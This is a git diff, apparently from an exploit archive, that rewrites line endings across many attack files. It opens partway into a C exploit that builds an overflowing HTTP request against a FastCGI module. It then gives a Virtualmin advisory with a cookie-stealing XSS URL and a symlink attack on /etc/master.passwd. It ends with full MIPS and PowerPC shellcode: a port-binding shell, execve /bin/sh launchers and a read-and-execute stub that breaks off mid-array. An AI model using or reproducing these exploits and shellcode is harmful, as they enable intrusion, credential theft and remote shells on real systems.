RANDOM_CHAR[rand() % (strlen(RANDOM_CHAR))]; - } - } else { - memset(buffer, c, length); - } - } - - return buffer; -} - -/* generate_array - * generate character array (input: comma separated list) - */ -char **generate_array(char *list, char separator, int *length) { - char **data = NULL; - int i = 0; - int start = 0; - int j = 1; - - if (list) { - for (i = 0; i <= strlen(list); i++) { - if (list[i] == separator || - i == strlen(list)) { - data = realloc(data, (j + 1) * (sizeof(char*))); - if (data) { - data[j - 1] = malloc(i - start + 1); - if (data[j - 1]) { - strncpy(data[j - 1], list + start, i - start); - data[j - 1][i - start + 1] = 0; - } - data[j] = NULL; - } - start = i + 1; - j++; - } - } - *length = j; - } - - return data; -} - -/* generate_request - * generate http request to trigger the overflow in fastcgi module - * and overwrite fcgi param data with post content - */ -char *generate_request(char *server, char *port, - char *script, char **names, - char **values, int *length_out, - int random_mode) { - char *param; - int param_size; - char *request; - int offset; - int length; - int i; - int fillup; - char *name; - char *value; - - /* array of header data that is used to create header name and value lines - * most of this values can be changed -> only length is important and a - * few characters */ - struct header_t header[] = { - { 0x01, '0', 0x04, FILL_CHAR[0], NULL }, - { FILL_CHAR[0] - 0x5 - 0x2, 'B', FILL_CHAR[0] - 0x2, 'B', NULL }, - { 0x01, '1', 0x5450 - ( (FILL_CHAR[0] + 0x1) * 2) - 0x1 - 0x5 - 0x1 - 0x4, 'C', NULL }, - { 0x01, '2', '_' - 0x1 - 0x5 - 0x1 - 0x1, 'D', NULL }, - { 0x01, '3', 0x04, FILL_CHAR[1], NULL }, - { FILL_CHAR[1] - 0x5 - 0x2, 'F', FILL_CHAR[1] - 0x2, 'F', NULL }, - { 0x01, '4', 0x5450 - ( (FILL_CHAR[1] + 0x1) * 2) - 0x1 - 0x5 - 0x1 - 0x4, 'H', NULL }, - { 0x01, '5', '_' - 0x1 - 0x5 - 0x1 - 0x1, 'I', NULL }, - { 0x01, '6', 0x04, FILL_CHAR[2], NULL }, - { FILL_CHAR[2] - 0x5 - 0x2, 'K', FILL_CHAR[2] - 0x2, 'K', NULL }, - { 0x01, '7', 0x5450 - ( (FILL_CHAR[2] + 0x1) * 2) - 0x1 - 0x5 - 0x1 - 0x4, 'L', NULL }, - { 0x01, '8', '_' - 0x1 - 0x5 - 0x1 - 0x1, 'M', NULL }, - { 0x01, '9', 0, 0, "uvzz" }, - { FILL_CHAR[3] - 0x5 - 0x2, 'O', FILL_CHAR[3] - 0x2, 'O', NULL }, - { 0x01, 'z', 0x1cf - ((FILL_CHAR[3]- 0x1 ) * 2) -0x1 - 0x5 - 0x1 - 0x4, 'z', NULL }, - { 0x00, 0x00, 0x00, 0x00, NULL } - }; - - /* fill rest of post content with data */ - char content_part_one[] = { - 0x06, 0x80, 0x00, 0x00, 0x00, 'H', 'T', 'T', 'P', '_', 'W' - }; - - /* set a fake FastCGI record to mark the end of data */ - char content_part_two[] = { - 0x01, 0x05, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 - }; - - param = generate_param(¶m_size, names, values); - if (param && param_size > 0) { - fillup = 0x54af - 0x5f - 0x1e3 - param_size - 0x1 - 0x5 - 0x1 - 0x4; - length = REQUEST_SIZE_BASE + param_size + - strlen(server) + strlen(port) + - strlen(script); - request = (char*)malloc(length); - if (request) { - memset(request, 0, length); - offset = sprintf(request, - "POST %s HTTP/1.1\r\n" - "Host: %s:%s\r\n" - "Connection: close\r\n" - "Content-Length: %d\r\n" - "Content-Type: application/x-www-form-urlencoded\r\n", - script, - server, port, - fillup + param_size + sizeof(content_part_one) + - sizeof(content_part_two) + 0x5f); - for (i = 0; header[i].name_length != 0; i++) { - name = generate_buffer(header[i].name_length, - header[i].name_char, - header[i].name_length != 1 ? random_mode : 0); - - if (header[i].value_value) { - value = header[i].value_value; - } else { - value = generate_buffer(header[i].value_length, - header[i].value_char, - header[i].value_length != 4 && - header[i].value_char != 'z' ? random_mode : 0); - } - - offset += sprintf(request + offset, - "%s: %s\r\n", name, value); - if (!header[i].value_value) { - free(value); - } - free(name); - } - - offset += sprintf(request + offset, "\r\n"); - - memcpy(request + offset, param, param_size); - offset += param_size; - - content_part_one[0x03] = (fillup >> 8) & 0xff; - content_part_one[0x04] = fillup & 0xff; - for (i = 0; i < sizeof(content_part_one); i++) { - request[offset++] = content_part_one[i]; - } - for (i = 0; i < fillup + 0x5f; i++) { - request[offset++] = random_mode ? RANDOM_CHAR[rand() % (strlen(RANDOM_CHAR))] : 'W'; - } - for (i = 0; i < sizeof(content_part_two); i++) { - request[offset++] = content_part_two[i]; - } - - *length_out = offset; - } - } - - return request; -} - -/* usage - * display help screen - */ -void usage(int argc, char **argv) { - fprintf(stderr, - "usage: %s [-h] [-v] [-r] [-d ] [-s -https://127.0.0.1:10000/virtual-server/link.cgi/%3Ci%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E - -#3 Anonymous proxy -The attacker is able to use "Preview Website" featrue to hide hers real -location and conduct attacks on different servers in the Internet. - -Example: -https://127.0.0.1:10000/virtual-server/link.cgi/67.228.198.99/http://www.virtualmin.com/ - -#4 Information disclousure -It's possible to view and/or copy any file on the server due to system() -call -in mysql module, which copies any file specified by the user -to Virtualmin temporary dir. Note it's a time based attack as the copied -file -is almost immediately removed after creation. - -#5 Information disclousure -It's possible to view any file on the server because Virtualmin doesn't drop -root privileges to perform some of its actions. - -Example: -Use the "Execute SQL" feature in the mysql module by passing -"/etc/master.passwd" parameter as the file path to the .sql file: - --- cut -- -Output from SQL commands in file /etc/master.passwd .. -ERROR 1064 (42000) at line 3: You have an error in your SQL syntax; -check the manual that corresponds to your MySQL server version for the -right syntax to use near 'root:$1$HASH_HERE.:0:0::0:0:Charlie -&:/root:/usr/local/bin/' at line 1 --- cut -- - -#6 Symlink attacks -There are Virtualmin modules which allows the attacker to conduct a -successful symlink attack, which may lead to a full compromise of the -server. - -Example for "Backup Virtual Servers": -1) Regular user creates backupdir and symlink: - $ mkdir virtualmin-backup && ln -s /etc/master.passwd -virtualmin-backup/test - $ ls -la /etc/master.passwd - -rw------- 1 root wheel 1024 Jan 19 23:08 /etc/master.passwd - -2) From the panel regular user creates backup: - "Backup and Restore" -> "Backup Virtual Servers" and "Destination and -format" - -set options to: - - Backup destination [x] File or directory under virtualmin-backup/ - "test" - Backup format [x] Single archive file - -and create backup by submitting "Backup Now". - -3) Regular user now owns the symlinked file: - $ ls -la /etc/master.passwd - -rw------- 1 user user 1024 Jan 21 00:51 /etc/master.passwd - -Status: -The vendor has provided updates and solutions to all vulnerabilities -described above. Upgrading immediately is strongly recommended for all -Virtualmin users. - -Disclosure timeline: -21 VI 2009: Detailed information with examples and PoCs sent to the vendor. -24 VI 2009: Initial vendor response. -25 VI 2009: Few more vulnerabilities with examples and PoCs sent to the -vendor. -26 VI 2009: Hot fix for the mysql module released by the vendor. -05 VII 2009: New version of the Virtualmin with fixes released by the -vendor. -14 VII 2009: Security bulletin released. - -Links: -* http://www.virtualmin.com/ -* http://www.virtualmin.com/node/10412 -* http://www.virtualmin.com/node/10413 - - -Best regards, -Filip Palian - -# milw0rm.com [2009-07-14] +Virtualmin Multiple Vulnerabilities + +by Filip Palian +https://127.0.0.1:10000/virtual-server/link.cgi/%3Ci%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E + +#3 Anonymous proxy +The attacker is able to use "Preview Website" featrue to hide hers real +location and conduct attacks on different servers in the Internet. + +Example: +https://127.0.0.1:10000/virtual-server/link.cgi/67.228.198.99/http://www.virtualmin.com/ + +#4 Information disclousure +It's possible to view and/or copy any file on the server due to system() +call +in mysql module, which copies any file specified by the user +to Virtualmin temporary dir. Note it's a time based attack as the copied +file +is almost immediately removed after creation. + +#5 Information disclousure +It's possible to view any file on the server because Virtualmin doesn't drop +root privileges to perform some of its actions. + +Example: +Use the "Execute SQL" feature in the mysql module by passing +"/etc/master.passwd" parameter as the file path to the .sql file: + +-- cut -- +Output from SQL commands in file /etc/master.passwd .. +ERROR 1064 (42000) at line 3: You have an error in your SQL syntax; +check the manual that corresponds to your MySQL server version for the +right syntax to use near 'root:$1$HASH_HERE.:0:0::0:0:Charlie +&:/root:/usr/local/bin/' at line 1 +-- cut -- + +#6 Symlink attacks +There are Virtualmin modules which allows the attacker to conduct a +successful symlink attack, which may lead to a full compromise of the +server. + +Example for "Backup Virtual Servers": +1) Regular user creates backupdir and symlink: + $ mkdir virtualmin-backup && ln -s /etc/master.passwd +virtualmin-backup/test + $ ls -la /etc/master.passwd + -rw------- 1 root wheel 1024 Jan 19 23:08 /etc/master.passwd + +2) From the panel regular user creates backup: + "Backup and Restore" -> "Backup Virtual Servers" and "Destination and +format" + +set options to: + + Backup destination [x] File or directory under virtualmin-backup/ - "test" + Backup format [x] Single archive file + +and create backup by submitting "Backup Now". + +3) Regular user now owns the symlinked file: + $ ls -la /etc/master.passwd + -rw------- 1 user user 1024 Jan 21 00:51 /etc/master.passwd + +Status: +The vendor has provided updates and solutions to all vulnerabilities +described above. Upgrading immediately is strongly recommended for all +Virtualmin users. + +Disclosure timeline: +21 VI 2009: Detailed information with examples and PoCs sent to the vendor. +24 VI 2009: Initial vendor response. +25 VI 2009: Few more vulnerabilities with examples and PoCs sent to the +vendor. +26 VI 2009: Hot fix for the mysql module released by the vendor. +05 VII 2009: New version of the Virtualmin with fixes released by the +vendor. +14 VII 2009: Security bulletin released. + +Links: +* http://www.virtualmin.com/ +* http://www.virtualmin.com/node/10412 +* http://www.virtualmin.com/node/10413 + + +Best regards, +Filip Palian + +# milw0rm.com [2009-07-14] diff --git a/platforms/linux/remote/915.c b/platforms/linux/remote/915.c index b988fb8fa..b187b24a2 100755 --- a/platforms/linux/remote/915.c +++ b/platforms/linux/remote/915.c @@ -240,6 +240,6 @@ void help(char *program_name) { printf("Target List:\n"); for(i = 0; targets[i].platform; i++) printf("\t\t%d\t %s\n", i, targets[i].platform); -} - -// milw0rm.com [2005-04-05] +} + +// milw0rm.com [2005-04-05] diff --git a/platforms/linux/remote/934.c b/platforms/linux/remote/934.c index 6b63a6388..5c8eebcf1 100755 --- a/platforms/linux/remote/934.c +++ b/platforms/linux/remote/934.c @@ -426,6 +426,6 @@ fprintf(stdout," {%d} : %s\n",i,platform[i].os_type); fprintf(stdout,"\n Example: %s -t 0 -h localhost\n",args); fprintf(stdout," Example: %s -r 0x82828282 -s 0x82828282 -f 15\n\n",args); exit(0); -} - -// milw0rm.com [2005-04-13] +} + +// milw0rm.com [2005-04-13] diff --git a/platforms/linux/remote/940.c b/platforms/linux/remote/940.c index 4e4143921..6fb058947 100755 --- a/platforms/linux/remote/940.c +++ b/platforms/linux/remote/940.c @@ -397,6 +397,6 @@ void usage(char *progname){ printf(" -l \tdistance from the start pointer. (\"GET\")\n"); printf(" -n \tadds to the overwritten \"kk\" integer.\n\n"); exit(0); -} - -// milw0rm.com [2005-04-14] +} + +// milw0rm.com [2005-04-14] diff --git a/platforms/linux/remote/970.c b/platforms/linux/remote/970.c index 4df775f23..348ecff93 100755 --- a/platforms/linux/remote/970.c +++ b/platforms/linux/remote/970.c @@ -556,6 +556,6 @@ main ( int argc, char* argv[] ) } close ( s ); return 0; -} - -// milw0rm.com [2005-04-29] +} + +// milw0rm.com [2005-04-29] diff --git a/platforms/linux/remote/981.c b/platforms/linux/remote/981.c index b4b9658c9..3e36e6ab0 100755 --- a/platforms/linux/remote/981.c +++ b/platforms/linux/remote/981.c @@ -492,6 +492,6 @@ main ( int argc, char* argv[] ) } close ( s ); return 0; -} - -// milw0rm.com [2005-05-05] +} + +// milw0rm.com [2005-05-05] diff --git a/platforms/linux/remote/99.c b/platforms/linux/remote/99.c index 4673b950a..1037523c0 100755 --- a/platforms/linux/remote/99.c +++ b/platforms/linux/remote/99.c @@ -844,6 +844,6 @@ int main(int argc, char *argv[]) { /* go for it */ own(*target,from,sub,to); exit(0); -} - -// milw0rm.com [2003-09-16] +} + +// milw0rm.com [2003-09-16] diff --git a/platforms/linux_mips/shellcode/13298.c b/platforms/linux_mips/shellcode/13298.c index a28891e77..1118a2645 100755 --- a/platforms/linux_mips/shellcode/13298.c +++ b/platforms/linux_mips/shellcode/13298.c @@ -1,92 +1,92 @@ -/* - MIPS little-endian - * - linux port listener 276 bytes shellcode - * - execve("/bin/sh",["/bin/sh"],[]); - * - port 0x1337 (4919) - * - tested on Linksys WRT54G/GL (DD-WRT Linux) - * - based on scut paper Writing MIPS/Irix shellcode - * - * vaicebine at gmail dot com - */ -#include - -char port_bind_shellcode[] = - "\xe0\xff\xbd\x27" /* addiu sp,sp,-32 */ - "\xfd\xff\x0e\x24" /* li t6,-3 */ - "\x27\x20\xc0\x01" /* nor a0,t6,zero */ - "\x27\x28\xc0\x01" /* nor a1,t6,zero */ - "\xff\xff\x06\x28" /* slti a2,zero,-1 */ - "\x57\x10\x02\x24" /* li v0,4183 ( __NR_socket ) */ - "\x0c\x01\x01\x01" /* syscall */ - "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ - "\xff\xff\x50\x30" /* andi s0,v0,0xffff */ - "\xef\xff\x0e\x24" /* li t6,-17 */ - "\x27\x70\xc0\x01" /* nor t6,t6,zero */ - "\x13\x37\x0d\x24" /* li t5,0x3713 (port 0x1337) */ - "\x04\x68\xcd\x01" /* sllv t5,t5,t6 */ - "\xff\xfd\x0e\x24" /* li t6,-513 */ - "\x27\x70\xc0\x01" /* nor t6,t6,zero */ - "\x25\x68\xae\x01" /* or t5,t5,t6 */ - "\xe0\xff\xad\xaf" /* sw t5,-32(sp) */ - "\xe4\xff\xa0\xaf" /* sw zero,-28(sp) */ - "\xe8\xff\xa0\xaf" /* sw zero,-24(sp) */ - "\xec\xff\xa0\xaf" /* sw zero,-20(sp) */ - "\x25\x20\x10\x02" /* or a0,s0,s0 */ - "\xef\xff\x0e\x24" /* li t6,-17 */ - "\x27\x30\xc0\x01" /* nor a2,t6,zero */ - "\xe0\xff\xa5\x23" /* addi a1,sp,-32 */ - "\x49\x10\x02\x24" /* li v0,4169 ( __NR_bind ) */ - "\x0c\x01\x01\x01" /* syscall */ - "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ - "\x25\x20\x10\x02" /* or a0,s0,s0 */ - "\x01\x01\x05\x24" /* li a1,257 */ - "\x4e\x10\x02\x24" /* li v0,4174 ( __NR_listen ) */ - "\x0c\x01\x01\x01" /* syscall */ - "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ - "\x25\x20\x10\x02" /* or a0,s0,s0 */ - "\xff\xff\x05\x28" /* slti a1,zero,-1 */ - "\xff\xff\x06\x28" /* slti a2,zero,-1 */ - "\x48\x10\x02\x24" /* li v0,4168 ( __NR_accept ) */ - "\x0c\x01\x01\x01" /* syscall */ - "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ - "\xff\xff\x50\x30" /* andi s0,v0,0xffff */ - "\x25\x20\x10\x02" /* or a0,s0,s0 */ - "\xfd\xff\x0f\x24" /* li t7,-3 */ - "\x27\x28\xe0\x01" /* nor a1,t7,zero */ - "\xdf\x0f\x02\x24" /* li v0,4063 ( __NR_dup2 ) */ - "\x0c\x01\x01\x01" /* syscall */ - "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ - "\x25\x20\x10\x02" /* or a0,s0,s0 */ - "\x01\x01\x05\x28" /* slti a1,zero,0x0101 */ - "\xdf\x0f\x02\x24" /* li v0,4063 ( __NR_dup2 ) */ - "\x0c\x01\x01\x01" /* syscall */ - "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ - "\x25\x20\x10\x02" /* or a0,s0,s0 */ - "\xff\xff\x05\x28" /* slti a1,zero,-1 */ - "\xdf\x0f\x02\x24" /* li v0,4063 ( __NR_dup2 ) */ - "\x0c\x01\x01\x01" /* syscall */ - "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ - "\x50\x73\x06\x24" /* li a2,0x7350 */ - "\xff\xff\xd0\x04" /* LB: bltzal a2,LB */ - "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ - "\xff\xff\x06\x28" /* slti a2,zero,-1 */ - "\xdb\xff\x0f\x24" /* li t7,-37 */ - "\x27\x78\xe0\x01" /* nor t7,t7,zero */ - "\x21\x20\xef\x03" /* addu a0,ra,t7 */ - "\xf0\xff\xa4\xaf" /* sw a0,-16(sp) */ - "\xf4\xff\xa0\xaf" /* sw zero,-12(sp) */ - "\xf0\xff\xa5\x23" /* addi a1,sp,-16 */ - "\xab\x0f\x02\x24" /* li v0,4011 ( __NR_execve ) */ - "\x0c\x01\x01\x01" /* syscall */ - "/bin/sh"; - -int main() -{ - void (*p)(void); - p = port_bind_shellcode; - printf("shellcode size %d\n", sizeof(port_bind_shellcode)); - p(); - - return 0; -} - +/* - MIPS little-endian + * - linux port listener 276 bytes shellcode + * - execve("/bin/sh",["/bin/sh"],[]); + * - port 0x1337 (4919) + * - tested on Linksys WRT54G/GL (DD-WRT Linux) + * - based on scut paper Writing MIPS/Irix shellcode + * + * vaicebine at gmail dot com + */ +#include + +char port_bind_shellcode[] = + "\xe0\xff\xbd\x27" /* addiu sp,sp,-32 */ + "\xfd\xff\x0e\x24" /* li t6,-3 */ + "\x27\x20\xc0\x01" /* nor a0,t6,zero */ + "\x27\x28\xc0\x01" /* nor a1,t6,zero */ + "\xff\xff\x06\x28" /* slti a2,zero,-1 */ + "\x57\x10\x02\x24" /* li v0,4183 ( __NR_socket ) */ + "\x0c\x01\x01\x01" /* syscall */ + "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ + "\xff\xff\x50\x30" /* andi s0,v0,0xffff */ + "\xef\xff\x0e\x24" /* li t6,-17 */ + "\x27\x70\xc0\x01" /* nor t6,t6,zero */ + "\x13\x37\x0d\x24" /* li t5,0x3713 (port 0x1337) */ + "\x04\x68\xcd\x01" /* sllv t5,t5,t6 */ + "\xff\xfd\x0e\x24" /* li t6,-513 */ + "\x27\x70\xc0\x01" /* nor t6,t6,zero */ + "\x25\x68\xae\x01" /* or t5,t5,t6 */ + "\xe0\xff\xad\xaf" /* sw t5,-32(sp) */ + "\xe4\xff\xa0\xaf" /* sw zero,-28(sp) */ + "\xe8\xff\xa0\xaf" /* sw zero,-24(sp) */ + "\xec\xff\xa0\xaf" /* sw zero,-20(sp) */ + "\x25\x20\x10\x02" /* or a0,s0,s0 */ + "\xef\xff\x0e\x24" /* li t6,-17 */ + "\x27\x30\xc0\x01" /* nor a2,t6,zero */ + "\xe0\xff\xa5\x23" /* addi a1,sp,-32 */ + "\x49\x10\x02\x24" /* li v0,4169 ( __NR_bind ) */ + "\x0c\x01\x01\x01" /* syscall */ + "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ + "\x25\x20\x10\x02" /* or a0,s0,s0 */ + "\x01\x01\x05\x24" /* li a1,257 */ + "\x4e\x10\x02\x24" /* li v0,4174 ( __NR_listen ) */ + "\x0c\x01\x01\x01" /* syscall */ + "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ + "\x25\x20\x10\x02" /* or a0,s0,s0 */ + "\xff\xff\x05\x28" /* slti a1,zero,-1 */ + "\xff\xff\x06\x28" /* slti a2,zero,-1 */ + "\x48\x10\x02\x24" /* li v0,4168 ( __NR_accept ) */ + "\x0c\x01\x01\x01" /* syscall */ + "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ + "\xff\xff\x50\x30" /* andi s0,v0,0xffff */ + "\x25\x20\x10\x02" /* or a0,s0,s0 */ + "\xfd\xff\x0f\x24" /* li t7,-3 */ + "\x27\x28\xe0\x01" /* nor a1,t7,zero */ + "\xdf\x0f\x02\x24" /* li v0,4063 ( __NR_dup2 ) */ + "\x0c\x01\x01\x01" /* syscall */ + "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ + "\x25\x20\x10\x02" /* or a0,s0,s0 */ + "\x01\x01\x05\x28" /* slti a1,zero,0x0101 */ + "\xdf\x0f\x02\x24" /* li v0,4063 ( __NR_dup2 ) */ + "\x0c\x01\x01\x01" /* syscall */ + "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ + "\x25\x20\x10\x02" /* or a0,s0,s0 */ + "\xff\xff\x05\x28" /* slti a1,zero,-1 */ + "\xdf\x0f\x02\x24" /* li v0,4063 ( __NR_dup2 ) */ + "\x0c\x01\x01\x01" /* syscall */ + "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ + "\x50\x73\x06\x24" /* li a2,0x7350 */ + "\xff\xff\xd0\x04" /* LB: bltzal a2,LB */ + "\x50\x73\x0f\x24" /* li t7,0x7350 (nop) */ + "\xff\xff\x06\x28" /* slti a2,zero,-1 */ + "\xdb\xff\x0f\x24" /* li t7,-37 */ + "\x27\x78\xe0\x01" /* nor t7,t7,zero */ + "\x21\x20\xef\x03" /* addu a0,ra,t7 */ + "\xf0\xff\xa4\xaf" /* sw a0,-16(sp) */ + "\xf4\xff\xa0\xaf" /* sw zero,-12(sp) */ + "\xf0\xff\xa5\x23" /* addi a1,sp,-16 */ + "\xab\x0f\x02\x24" /* li v0,4011 ( __NR_execve ) */ + "\x0c\x01\x01\x01" /* syscall */ + "/bin/sh"; + +int main() +{ + void (*p)(void); + p = port_bind_shellcode; + printf("shellcode size %d\n", sizeof(port_bind_shellcode)); + p(); + + return 0; +} + // milw0rm.com [2008-08-18] \ No newline at end of file diff --git a/platforms/linux_mips/shellcode/13299.c b/platforms/linux_mips/shellcode/13299.c index 35dde1dc2..4d1048c5a 100755 --- a/platforms/linux_mips/shellcode/13299.c +++ b/platforms/linux_mips/shellcode/13299.c @@ -1,39 +1,39 @@ -/* - MIPS little-endian - * - linux execve 60 bytes shellcode - * - execve("/bin/sh",["/bin/sh"],[]); - * - tested on Linksys WRT54G/GL (DD-WRT Linux) - * - based on scut paper Writing MIPS/Irix shellcode - * - * vaicebine at gmail dot com - */ -#include - - -char shellcode[] = { - "\x50\x73\x06\x24" /* li a2,0x7350 */ - "\xff\xff\xd0\x04" /* LB: bltzal a2,LB */ - "\x50\x73\x0f\x24" /* li $t7,0x7350 (nop) */ - "\xff\xff\x06\x28" /* slti a2, $0,-1 */ - "\xe0\xff\xbd\x27" /* addiu sp,sp,-32 */ - "\xd7\xff\x0f\x24" /* li t7,-41 */ - "\x27\x78\xe0\x01" /* nor t7,t7,zero */ - "\x21\x20\xef\x03" /* addu a0,ra,t7 */ - "\xe8\xff\xa4\xaf" /* sw a0,-24(sp) */ - "\xec\xff\xa0\xaf" /* sw zero,-20(sp) */ - "\xe8\xff\xa5\x23" /* addi a1,sp,-24 */ - "\xab\x0f\x02\x24" /* li v0,4011 */ - "\x0c\x01\x01\x01" /* syscall */ - "/bin/sh" -}; - -int main(int argc, char *argv[]) -{ - void (*p)(void); - p = shellcode; - printf("shellcode size %d\n", sizeof(shellcode)); - p(); - - return 0; -} - +/* - MIPS little-endian + * - linux execve 60 bytes shellcode + * - execve("/bin/sh",["/bin/sh"],[]); + * - tested on Linksys WRT54G/GL (DD-WRT Linux) + * - based on scut paper Writing MIPS/Irix shellcode + * + * vaicebine at gmail dot com + */ +#include + + +char shellcode[] = { + "\x50\x73\x06\x24" /* li a2,0x7350 */ + "\xff\xff\xd0\x04" /* LB: bltzal a2,LB */ + "\x50\x73\x0f\x24" /* li $t7,0x7350 (nop) */ + "\xff\xff\x06\x28" /* slti a2, $0,-1 */ + "\xe0\xff\xbd\x27" /* addiu sp,sp,-32 */ + "\xd7\xff\x0f\x24" /* li t7,-41 */ + "\x27\x78\xe0\x01" /* nor t7,t7,zero */ + "\x21\x20\xef\x03" /* addu a0,ra,t7 */ + "\xe8\xff\xa4\xaf" /* sw a0,-24(sp) */ + "\xec\xff\xa0\xaf" /* sw zero,-20(sp) */ + "\xe8\xff\xa5\x23" /* addi a1,sp,-24 */ + "\xab\x0f\x02\x24" /* li v0,4011 */ + "\x0c\x01\x01\x01" /* syscall */ + "/bin/sh" +}; + +int main(int argc, char *argv[]) +{ + void (*p)(void); + p = shellcode; + printf("shellcode size %d\n", sizeof(shellcode)); + p(); + + return 0; +} + // milw0rm.com [2008-08-18] \ No newline at end of file diff --git a/platforms/linux_mips/shellcode/13300.c b/platforms/linux_mips/shellcode/13300.c index 135428d31..5b858f8e5 100755 --- a/platforms/linux_mips/shellcode/13300.c +++ b/platforms/linux_mips/shellcode/13300.c @@ -1,31 +1,31 @@ -/* 56 bytes execve /bin/sh shellcode - linux-mipsel - * - by core (core@bokeoa.com) - * - * Note: For MIPS running in little-endian mode. - * Tested on a Cobalt Qube2 server running Linux 2.4.18 - * - * Greetz to bighawk... i couldn't get his execve to work - * for some reason :/ - */ - -char code[] = -/* 16 byte setreuid(0,0) by bighawk */ -//"\xff\xff\x04\x30\xff\xff\x05\x30" -//"\xe6\x0f\x02\x34\xcc\x48\x49\x03" - -/* 56 byte execve("/bin/sh",["/bin/sh"],[]) by core */ -"\xff\xff\x10\x04\xab\x0f\x02\x24" -"\x55\xf0\x46\x20\x66\x06\xff\x23" -"\xc2\xf9\xec\x23\x66\x06\xbd\x23" -"\x9a\xf9\xac\xaf\x9e\xf9\xa6\xaf" -"\x9a\xf9\xbd\x23\x21\x20\x80\x01" -"\x21\x28\xa0\x03\xcc\xcd\x44\x03" -"/bin/sh"; - -main() { - void (*a)() = (void *)code; - printf("size: %d bytes\n", sizeof(code)); - a(); -} - +/* 56 bytes execve /bin/sh shellcode - linux-mipsel + * - by core (core@bokeoa.com) + * + * Note: For MIPS running in little-endian mode. + * Tested on a Cobalt Qube2 server running Linux 2.4.18 + * + * Greetz to bighawk... i couldn't get his execve to work + * for some reason :/ + */ + +char code[] = +/* 16 byte setreuid(0,0) by bighawk */ +//"\xff\xff\x04\x30\xff\xff\x05\x30" +//"\xe6\x0f\x02\x34\xcc\x48\x49\x03" + +/* 56 byte execve("/bin/sh",["/bin/sh"],[]) by core */ +"\xff\xff\x10\x04\xab\x0f\x02\x24" +"\x55\xf0\x46\x20\x66\x06\xff\x23" +"\xc2\xf9\xec\x23\x66\x06\xbd\x23" +"\x9a\xf9\xac\xaf\x9e\xf9\xa6\xaf" +"\x9a\xf9\xbd\x23\x21\x20\x80\x01" +"\x21\x28\xa0\x03\xcc\xcd\x44\x03" +"/bin/sh"; + +main() { + void (*a)() = (void *)code; + printf("size: %d bytes\n", sizeof(code)); + a(); +} + // milw0rm.com [2005-11-09] \ No newline at end of file diff --git a/platforms/linux_ppc/shellcode/13301.c b/platforms/linux_ppc/shellcode/13301.c index ee1ec72f2..b57317048 100755 --- a/platforms/linux_ppc/shellcode/13301.c +++ b/platforms/linux_ppc/shellcode/13301.c @@ -1,28 +1,28 @@ -/* execve-core.c by Charles Stevenson */ -char hellcode[] = /* execve /bin/sh linux/ppc by core */ -// Sometimes you can comment out the next line if space is needed -"\x7c\x3f\x0b\x78" /*mr r31,r1*/ -"\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/ -"\x42\x40\xff\xf9" /*bdzl+ 10000454
*/ -"\x7f\x08\x02\xa6" /*mflr r24*/ -"\x3b\x18\x01\x34" /*addi r24,r24,308*/ -"\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/ -"\x38\x78\xfe\xf4" /*addi r3,r24,-268*/ -"\x90\x61\xff\xf8" /*stw r3,-8(r1)*/ -"\x38\x81\xff\xf8" /*addi r4,r1,-8*/ -"\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/ -"\x3b\xc0\x01\x60" /*li r30,352*/ -"\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/ -"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ -"/bin/shZ"; // the last byte becomes NULL - -int main(void) -{ - void (*shell)() = (void *)&hellcode; - printf("%d byte execve /bin/sh shellcode for linux/ppc by core\n", - strlen(hellcode)); - shell(); - return 0; -} - +/* execve-core.c by Charles Stevenson */ +char hellcode[] = /* execve /bin/sh linux/ppc by core */ +// Sometimes you can comment out the next line if space is needed +"\x7c\x3f\x0b\x78" /*mr r31,r1*/ +"\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/ +"\x42\x40\xff\xf9" /*bdzl+ 10000454
*/ +"\x7f\x08\x02\xa6" /*mflr r24*/ +"\x3b\x18\x01\x34" /*addi r24,r24,308*/ +"\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/ +"\x38\x78\xfe\xf4" /*addi r3,r24,-268*/ +"\x90\x61\xff\xf8" /*stw r3,-8(r1)*/ +"\x38\x81\xff\xf8" /*addi r4,r1,-8*/ +"\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/ +"\x3b\xc0\x01\x60" /*li r30,352*/ +"\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/ +"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ +"/bin/shZ"; // the last byte becomes NULL + +int main(void) +{ + void (*shell)() = (void *)&hellcode; + printf("%d byte execve /bin/sh shellcode for linux/ppc by core\n", + strlen(hellcode)); + shell(); + return 0; +} + // milw0rm.com [2005-11-09] \ No newline at end of file diff --git a/platforms/linux_ppc/shellcode/13302.c b/platforms/linux_ppc/shellcode/13302.c index 77e296d23..9cb5291dc 100755 --- a/platforms/linux_ppc/shellcode/13302.c +++ b/platforms/linux_ppc/shellcode/13302.c @@ -1,21 +1,21 @@ -/* readnexecppc-core.c by Charles Stevenson */ -char hellcode[] = /* read(0,stack,1028); stack(); linux/ppc by core */ -"\x7c\x63\x1a\x79" /* xor. r3,r3,r3 */ -"\x38\xa0\x04\x04" /* li r5,1028 */ -"\x30\x05\xfb\xff" /* addic r0,r5,-1025 */ -"\x7c\x24\x0b\x78" /* mr r4,r1 */ -"\x44\xde\xad\xf2" /* sc */ -"\x69\x69\x69\x69" /* nop */ -"\x7c\x29\x03\xa6" 